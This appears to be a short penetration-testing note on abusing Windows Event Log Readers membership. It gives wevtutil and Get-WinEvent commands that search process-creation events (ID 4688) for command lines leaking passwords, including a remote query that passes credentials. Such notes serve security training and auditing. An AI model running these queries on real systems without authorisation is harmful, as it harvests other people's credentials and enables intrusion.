Event Log Readers

Event Log Readers

This group is self-explainatory.

In many cases, the auditing of process creation events and corresponding command line values is enabled. In that case, this information is saved to the Windows security event log as event ID 4688: A new process has been created.

These logs can sometimes contain credentials.

Using wevutils to search in security logs

PS C:\hacker> wevtutil qe Security /rd:true /f:text | Select-String "/user"

        Process Command Line:   net use T: \\fs01\backups /user:tim MyStr0ngP@ssword

• wevtutil qe Security: Queries events in the "Security" log using the wevtutil utility.

• /rd:true: Reads the events in descending order (most recent first).

• /f:text: Outputs the events in text format.

• | Select-String "/user": Pipes (|) the output to Select-String, which filters lines containing the string "/user

We can also pass it credentials to query the security logs of a remote machine

wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

• /r:share01: Specifies the remote computer share01 to query the event log from.

• /u:julie.clay: Specifies the username julie.clay to authenticate on the remote machine.

• /p:Welcome1: Specifies the password Welcome1 for authentication.

Using Get-WinEvent to search in security logs

Get-WinEvent requires administrator access or permissions adjusted on the registry key HKLM\System\CurrentControlSet\Services\Eventlog\Security. Membership in just the Event Log Readers group is not sufficient.

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

The cmdlet can also be run as another user with the -Credential parameter.

Note on logs

In the example above, we query local logs.

When you use AD, you still have local security logs on each domain-joined machine, so this attack still applies because these logs will continue to capture local events.

AD logs on Domain Controllers capture domain-level activities. Both types of logs coexist and provide different layers of insight.